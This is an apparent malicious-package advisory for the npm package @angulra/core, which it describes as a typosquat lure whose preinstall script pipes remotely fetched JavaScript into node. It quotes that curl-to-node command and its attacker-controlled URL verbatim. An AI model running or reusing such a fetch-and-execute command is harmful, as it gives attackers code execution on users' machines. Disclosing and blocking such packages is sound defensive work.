@angulra/core@1.0.67
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC
OSV ID
MAL-2026-17496
Ecosystem
npm
Summary
The package.json preinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from an unrelated third-party host (gitflic.ru, proxied via web.archive.org) and piping it directly into node at npm install time. The fetch is unpinned, has no integrity or signature check, and the source is attacker-controlled and mutable. The scoped name @angulra/core resembles Angular ecosystem names while the package description (Core Libs) and dependency set (mysql, pg, redis, knox, amqp) are inconsistent with any coherent library purpose, consistent with a typosquat lure. Any environment running npm install on this package executes arbitrary remote code with the installing user's privileges.
Source: amazon-inspector (7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.